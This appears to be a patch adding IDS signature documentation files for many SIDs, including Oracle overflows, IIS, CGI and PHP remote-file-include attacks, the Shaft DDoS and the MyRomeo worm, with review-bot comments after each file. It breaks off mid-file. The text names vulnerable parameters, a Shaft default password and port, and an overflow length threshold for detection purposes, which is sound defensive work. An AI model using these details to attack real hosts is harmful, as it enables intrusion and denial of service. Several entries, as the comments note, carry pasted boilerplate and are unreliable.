+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
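Review bot: same template break as in 2892.txt: "vulnerability in the procedure drop_site_priority" is followed by a line beginning ". This procedure is included in", leaving the period orphaned; join it as "procedure drop_site_priority. This procedure is included in dbms_repcat." The package is written as "dbms_repcat" here but as "sys.dbms_repcat_conf" in 2892.txt; use the schema-qualified form in both. "Oracle Oracle9i" repeats the vendor, and Additional References is empty for an issue whose Corrective Action is "Apply the appropriate vendor supplied patch".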
--- /dev/null
+++ b/doc/signatures/1200.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1200
+
+--
+Summary:
+This event is generated when an invalid URL response is sent from a
+webserver to a client.
+
+--
+Impact:
+Information gathering and possible Denial of Service (DoS).
+
+--
+Detailed Information:
+This event is generated when an invalid URL response is sent from a
+webserver to a client. It is possible under some circumstances, to cause
+a DoS condition by supplying an invalid URL to a web server running an
+affected version of Microsoft IIS 4.0. Certain invalid URLs can cause
+the system to make an invalid memory request that will in turn stop the
+IIS service from running.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0 on NT systems
+	
+--
+Attack Scenarios:
+The attacker would merely need to make a web request using an invalid
+URL.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the system to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
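Review bot: the Summary says the event fires on the response "sent from a webserver to a client", so the alert's source address is the IIS host and the client that submitted the invalid URL is the destination; Detailed Information and Attack Scenarios should state this explicitly, otherwise an analyst triaging the alert will look at the wrong side of the conversation for the attacker. Additional References is empty although Corrective Action points to vendor patches; add the vendor bulletin for the IIS 4.0 invalid-URL denial of service so the affected service-pack level can be verified.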
--- /dev/null
+++ b/doc/signatures/1803.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1803
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
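Review bot: Detailed Information never says what this rule actually matches, only that IIS vulnerabilities "are legion", so an analyst cannot tell SID 1803 apart from the other generic IIS rules; state the request pattern the rule looks for and which IIS versions it concerns, and fill in the empty Additional References with the corresponding advisory. "attackers choosing" in Impact should be "attacker's choosing".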
--- /dev/null
+++ b/doc/signatures/239.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+239
+
+--
+Summary:
+This event is generated when a DDoS Shaft handler communicates with a Shaft agent.  It is also possible that this event may be generated when any host attempts to discover a Shaft agent.   
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft handler or a host attempting to discover Shaft agents.  If the listed destination IP is in your network, it may be a Shaft agent.
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Handlers communicate with agents to direct them to launch attacks. A handler may communicate with an agent using a UDP packet to destination port 18753 with a content of "alive tijgu.  This communication checks if an agent is alive and uses a default password of "tijgu".
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft handler needs to discover if an agent is alive before directing it to launch an attack.
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS255
+
+Miscellaneous:
+http://biocserver.cwru.edu/~jose/shaft_analysis/
+
+
+
+--
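Review bot: the Detailed Information paragraph has an unbalanced quote, "alive tijgu. This communication" should read "alive tijgu". This communication, and the direction should be stated to match Impact: the UDP packet to destination port 18753 travels from handler to agent, so an internal source address is a suspected handler (or a scanner probing for agents) and an internal destination address is a suspected agent. The two links under Additional References are old and should be verified before the file ships.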
--- /dev/null
+++ b/doc/signatures/2999.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2999
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
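Review bot: False Positives "None known" is wrong for this rule: a remote shutdown over SMB is exactly what an administrator does from a management console or with shutdown /m \\host, so shutdown requests from known administrative hosts should be listed as an expected source of events and the rule tuned for the protected network's management subnet. Impact "Serious." should say what the impact is (denial of service of the target host, as Detailed Information already states). The Corrective Action item "Disallow remote registry manipulation" is relevant because remote shutdown has historically been carried over the same winreg named pipe as remote registry access, but the text should say so, or the reader will take it for a paste from another rule.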
--- /dev/null
+++ b/doc/signatures/1627.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1627
+
+--
+Summary:
+This event is generated when packets on the network are using an 
+unassigned or reserved IP protocol.
+
+--
+Impact:
+Possible prelude to system compromise.
+
+--
+Detailed Information:
+Under normal circumstances IP packets do not use unassigned or reserved 
+protocols.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	All
+
+--
+Attack Scenarios:
+The attacker may send specially crafted packets using an unassigned or 
+reserved protocol.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Research or testing of new protocols may trigger this event.
+
+Novell use protocol 224 for the Cluster heart beat
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Use a packet filtering device to reject packets using an unknown 
+protocol.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+IANA
+http://www.iana.org/assignments/protocol-numbers
+
+--
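Review bot: the second paragraph of Detailed Information starts mid-sentence ("an indicator of unauthorized network use, ..."); the subject is missing and it should read "This may be an indicator of unauthorized network use, reconnaissance activity or system compromise." Also "reconnaisance" is misspelled and "Novell use protocol 224 for the Cluster heart beat" should read "Novell uses protocol 224 for its cluster heartbeat". Since False Positives already names a legitimate user of a reserved protocol number, Corrective Action should say to exempt such protocols before rejecting unknown ones at the packet filter, or the filter will break the cluster.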
--- /dev/null
+++ b/doc/signatures/1718.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1718
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
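Review bot: Detailed Information and Attack Scenarios are generic CGI boilerplate (reused verbatim for other CGI SIDs in this patch) and do not say which script or request pattern SID 1718 matches; add the specific application and URI so an analyst can confirm the target exists on the destination host before escalating. "ona web server" should be "on a web server" and "attackers choosing" should be "attacker's choosing".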
--- /dev/null
+++ b/doc/signatures/100000468.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000468
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "WebprojectDB" application running on a webserver. 
+Access to the file "lang.php" using a remote file being passed as the "INCDIR" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "INCDIR" parameter in the "lang.php" script used by the 
+"WebprojectDB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WebprojectDB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
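Review bot: the third paragraph of Detailed Information (credential validation, trust relationships) does not describe a remote file include bug and should be dropped from this file; what matters for "INCDIR" in "lang.php" is that the script includes a path built from a request parameter, so Corrective Action should add the PHP-level mitigations (allow_url_fopen and allow_url_include set to Off, register_globals Off) alongside "apply vendor patches". False Positives "None known" is optimistic for a URI-content rule: web vulnerability scanners will trigger it against hosts that do not run WebprojectDB at all. "an exploitation attempt has been attempted" in the Summary should read "an exploitation attempt was made".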
--- /dev/null
+++ b/doc/signatures/724.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+724
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
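Review bot: spelling in Summary and Detailed Information: "specifcally" -> "specifically", "propogation"/"propogates" -> "propagation"/"propagates", "WIndows" -> "Windows". Detailed Information should also say what the rule matches on; the False Positives section implies it is the subject-line list, in which case the rule fires on any SMTP traffic carrying one of those subjects and the attachment names Myjuliet.chm and Myromeo.exe are the stronger indicator for an analyst confirming an infection.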
--- /dev/null
+++ b/doc/signatures/1046.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1046
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
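Review bot: the Sid block is formatted differently from every other file in this patch ("Sid: 1046" on one line followed by two blank lines); use the "Sid:" / "1046" layout so tooling that parses these files sees a consistent format. Impact "Information gathering possible administrator access." is missing punctuation ("Information gathering. Possible administrator access."). As with the other IIS files, Detailed Information does not say which file the rule looks for, although Attack Scenarios says the attacker "can retrieve a sensitive file"; name it.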
--- /dev/null
+++ b/doc/signatures/2409.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+2409
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer by
+supplying a very long username to an APOP POP3 service.
+
+--
+Impact:
+Serious. Several POP3 servers are vulnerable to USER buffer overflows.
+
+--
+Detailed Information:
+By supplying more than 626 bytes of data to the APOP USER command on 1st
+Class Internet Solutions' 1st Class Mail Server, an attacker may
+overflow a buffer resulting in the opportunity to execute code of their
+choosing on the targeted machine with the privileges of the user running
+the service.
+
+Other Mail software may be prone to this attack.
+
+--
+Affected Systems:
+	1st Class Mail Server
+
+--
+Attack Scenarios:
+An attacker may connect to the service and supply an over-long username
+to overflow the buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check for other events generated by the source IP address.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
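Review bot: "the APOP USER command" in Detailed Information conflates two POP3 commands: APOP takes a name and an MD5 digest, USER takes only a name. Say which command the rule matches on and whether the 626-byte threshold applies to the name argument of that command, since that determines whether long but legitimate usernames can trigger the rule (False Positives currently says "None known"). "Other Mail software may be prone to this attack" belongs under Affected Systems, and Additional References is empty.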
--- /dev/null
+++ b/doc/signatures/2689.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2689
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure disable_receiver_trace
+. This procedure is included in
+sys.dbms_internal_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
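Review bot: same line-break problem as 2780.txt, "disable_receiver_trace" / ". This procedure is included in" should be one sentence, and the package name should be written consistently across the Oracle files: this one says "sys.dbms_internal_repcat" while 2780.txt gives "dbms_repcat" without the schema prefix. Affected Systems "Oracle Oracle9i" duplicates the vendor name.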
--- /dev/null
+++ b/doc/signatures/100000742.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000742
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "functions.inc" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "functions.inc" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
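Review bot: "$_CONF[path]" is not a parameter the script declares, it is an element of Geeklog's configuration array that can only be overwritten from the request when PHP's register_globals is on, so Corrective Action should say to set register_globals to Off (and allow_url_fopen/allow_url_include Off) rather than only "apply vendor patches". The third paragraph of Detailed Information (credential validation) is unrelated boilerplate, as in 100000468.txt, and "ona web server" should be "on a web server". Since "functions.inc" is an include file rather than an entry point, the Summary should say the rule matches a request for that file, not "access to" it.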
--- /dev/null
+++ b/doc/signatures/3080.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+3080
+
+--
+Summary:
+This event is generated when a remote attacker sends an overly long "secure"
+query to a host acting as an Unreal engine server.  This may
+indicate an attempt to exploit a buffer overflow vulnerability.
+
+--
+Impact:
+Serious. A successful buffer overflow can permit the execution of arbitrary
+code on a vulnerable system.
+
+--
+Detailed Information:
+Unreal Tournament 2003 and 2004 are popular games developed by EpicGames and
+available for Linux, Windows and Macintosh platforms. The Unreal engine is
+used for both client and server functionality. An overly long "secure"
+query can be sent to the game server, causing a buffer overflow and the
+subsequent execution of arbitrary code.
+
+--
+Affected Systems:
+	Multiple versions of the Unreal Engine running on Linux, Microsoft
+	Windows and Macintosh platforms.
+
+--
+Attack Scenarios:
+An attacker can send an overly long "secure" query to a vulnerable host, causing
+a buffer overflow and the subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+Unreal servers can be configured to run on arbitrary ports.
+Administrators should either change the port used in the rule or create
+a variable for the ports to be used in the rule.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current nonaffected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+OSVDB
+http://www.osvdb.org/displayvuln.php?osvdb_id=7217&Lookup=Lookup
+
+--
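Review bot: the False Positives paragraph describes a false negative, not a false positive: an Unreal server on a non-default port is missed by the rule, it does not cause spurious alerts. Move the port-variable advice under False Negatives and leave False Positives as "None known". "EpicGames" should be "Epic Games".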
--- /dev/null
+++ b/doc/signatures/3286.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3286
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
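Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") contradicts the Detailed Information above it, which describes malformed DCOM requests over RPC; this reads as pasted from an SMB rule and should describe a malformed RPC request to the DCOM interface instead. "Expoit" -> "Exploit". In Corrective Action, note that 139 and 445 are SMB ports that carry RPC over named pipes, so blocking them affects file and print sharing as well as DCOM.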
--- /dev/null
+++ b/doc/signatures/2458.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2458
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running has joined a chat room or is examining chat rooms to join.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Yahoo IM provides a means of allowing users who share similar interests to join a chat room and exchange messages.  While there are no known exploits associated with exchanging messages, this type of activity may not be appropriate in certain network environments.  
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attacks.
+
+--
+Ease of Attack:
+No known attacks.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1590.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1590
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
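Review bot: this file is a verbatim copy of 1718.txt apart from the Sid, so it carries the same problems: the generic CGI text does not say which script or URI SID 1590 matches, "ona" should be "on a", and "attackers choosing" should be "attacker's choosing". If the two rules target different scripts, each file needs its own Detailed Information.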
--- /dev/null
+++ b/doc/signatures/1920.txt
@@ -0,0 +1,57 @@
+Nigel:  Old reference pointed to something totally unrelated.
+Rule:
+--
+
+Sid:
+1920
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability associated with the FTP SITE NEWER command that may cause a denial of service or allow the upload of executable files.
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a denial of service or allow the upload of executable files on the vulnerable FTP server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability associated with the WU-FTP server version of the SITE NEWER command. It is possible to cause a denial of service attack that consumes memory or upload files to execute arbitrary commands with the privileges of the process running the FTP server. 
+
+--
+Affected Systems:
+Hosts running WU-FTPD 2.5.0.  
+
+--
+Attack Scenarios:
+An attacker can cause a denial of service or upload files to execute arbitrary commands on the vulnerable FTP server.
+
+--
+Ease of Attack:
